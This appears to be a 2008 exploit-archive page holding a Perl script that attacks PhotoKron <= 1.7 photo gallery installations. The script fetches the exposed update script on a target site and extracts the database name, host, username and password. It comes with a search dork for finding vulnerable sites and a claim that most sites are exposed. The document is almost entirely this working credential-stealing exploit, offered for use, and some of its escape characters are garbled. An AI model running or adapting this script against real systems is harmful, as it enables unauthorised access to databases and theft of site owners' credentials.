photokron <= 1.7 (update script) Remote Database Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : photokron <= 1.7 (update script) Remote Database Disclosure Exploit
# Published : 2008-01-11
# Author : Pr0metheuS
# Previous Title : 0DayDB 2.3 (delete id) Remote Admin Bypass Exploit
# Next Title : DomPHP <= 0.81 Remote Add Administrator Exploit

#!/usr/bin/perl
#Script : PhotoKron All Version
#All Version
#Author : Pr0metheuS
#Gr33tz to Gr33tz-Team
#Gr33tz-Team.ORG
#Dork : "Powered by photokorn"
### INFO ##
# Works IF /update/ is on server...60% site are vulnerable....
## INFO ##
use LWP::UserAgent;
if (@ARGV!=2) {
	print "-=-=-=-=-=-=-=-=-=-=-=--=n";
    print "PhotoKorn Remote Database Infon";
    print "by Pr0metheuSn";
    print "perl $0 <site> <path>n";
	print "-=-=-=-=-=-=-=-=-=-=-=--=n";
}
(my $site,my $path)=@ARGV;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "".$site."".$path."/update/update3.php");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success) {
	print "-=-=-=-=-=-=-=-=-=-=-=--=n";
    print "PhotoKorn Remote Database Infon";
    print "by Pr0metheuSnn";
    
if($con =~ /<input type="text" value="(.*)" name="dbname">/){
	$dbname = $1;
	print "[+] DBNAME : $dbnamen";
}
if($con =~ /<input type="text" value="(.*)" name="dbhost">/){
	$dbhost = $1;
	print "[+] DBHOST : $dbhostn";
}
if($con =~ /<input type="text" value="(.*)" name="dbusername"></td>/){
	$dbuser = $1;
	print "[+] DBUSER : $dbusern";
}
if($con =~ /<input type="password" value="(.*)" name="dbpassword"></td>/){
	$dbpass = $1;
	print "[+] DBPASSWORD : $dbpassn";
}
print "-=-=-=-=-=-=-=-=-=-=-=--=n";



}
else{
	print "[+] Exploit Failed...n";
}

# www.Syue.com [2008-01-11]